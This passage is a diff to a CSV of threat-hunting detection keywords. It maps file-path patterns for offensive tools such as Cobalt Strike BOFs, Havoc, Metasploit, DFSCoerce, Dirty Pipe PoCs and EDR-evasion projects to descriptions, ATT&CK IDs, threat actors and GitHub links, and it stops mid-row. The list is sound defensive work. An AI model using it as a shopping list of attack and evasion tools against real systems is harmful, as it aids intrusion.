-"*/detect_antivirus/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/detect_antivirus/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/detect_antivirus/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*/detect-hooks.c*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/detect-hooks.cna*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/detect-hooks.h*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/Detect-Hooks/*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/DFSCoerce.git*","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","635","78","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" +"*/dfscoerce.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/dhcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Dialogs/Payload.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/Dialogs/Payload.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*/dicom-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dicom-ping.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dict-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/dicts/ftp_default.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/dicts/ftp_default.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" "*/DInjector.git*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","","","" "*/DInvoke/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*/DInvokeResolver/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*/dir_brute.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" -"*/dirbuster*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/dirbuster*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/dirbuster/*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/DirCreate2System.git*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*/direct_syscall_amd64.s*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" -"*/dirsearch.py*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","665","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*/dirsearch.py*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*/Dirty-Pipe.sh*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/imfiver/CVE-2022-0847","1","1","N/A","N/A","3","257","74","2023-02-02T02:17:30Z","2022-03-07T18:36:50Z" "*/Dirty-Pipe.sh*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","1","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" "*/Dirty-Pipe/main/exploit-static*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" @@ -3340,26 +3349,26 @@ "*/dist/fw_walk.*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "*/distcc-cve2004-2687.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/distopia-test*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","0","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" -"*/dll/inject/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/dll/inject/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/dllexploit.cpp*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*/dllexploit.exe*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" -"*/DllExport.bat*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*/DllExport.bat*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*/DLL-Hijack*","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*/DllNotificationInjection.git*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" "*/DllProxy.git*","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","16","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" "*/dlls/c2.c*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" -"*/dns_grabber.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*/dns_spoof*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/dns_grabber.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/dns_spoof*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*/dns-blacklist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - 